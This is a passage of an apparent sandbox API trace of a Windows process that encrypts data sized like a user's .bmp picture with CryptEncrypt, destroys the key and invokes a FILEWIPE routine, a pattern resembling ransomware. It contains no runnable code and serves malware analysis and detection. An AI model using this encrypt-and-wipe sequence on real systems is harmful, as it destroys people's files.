wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.863] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.863] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.864] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.864] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14127, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14130) returned 1 [0039.864] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.865] CharLowerBuffW (in: lpsz="byte[82225]", cchLength=0xb | out: lpsz="byte[82225]") returned 0xb [0039.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.867] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.867] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.869] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95d268*, pdwDataLen=0x6ae220*=0x14127, dwBufLen=0x14130 | out: pbData=0x95d268*, pdwDataLen=0x6ae220*=0x14130) returned 1 [0039.870] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.870] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.870] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.872] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.873] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.873] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.873] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.873] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.873] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.873] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.873] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.873] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.881] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.881] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.881] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.886] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.886] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.886] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.886] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.887] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.887] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0039.887] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.887] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.887] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.887] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.887] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.887] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.887] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.887] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.887] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.888] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.888] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.888] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.888] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.888] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.888] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.888] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.888] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.888] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.888] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.888] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.888] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.889] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.889] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.889] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0039.889] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.889] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.889] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.889] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.889] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.889] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.889] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.890] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.890] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0039.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1552e0, ftCreationTime.dwHighDateTime=0x1d5bb38, ftLastAccessTime.dwLowDateTime=0x7e736a90, ftLastAccessTime.dwHighDateTime=0x1d5ba54, ftLastWriteTime.dwLowDateTime=0x7e736a90, ftLastWriteTime.dwHighDateTime=0x1d5ba54, nFileSizeHigh=0x0, nFileSizeLow=0x14127, dwReserved0=0x0, dwReserved1=0x777648, cFileName="K_hrf3du.bmp", cAlternateFileName="")) returned 0x7c2100 [0039.891] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.891] CharLowerBuffW (in: lpsz="byte[82215]", cchLength=0xb | out: lpsz="byte[82215]") returned 0xb [0039.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.891] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.892] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.892] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.892] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.892] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.893] 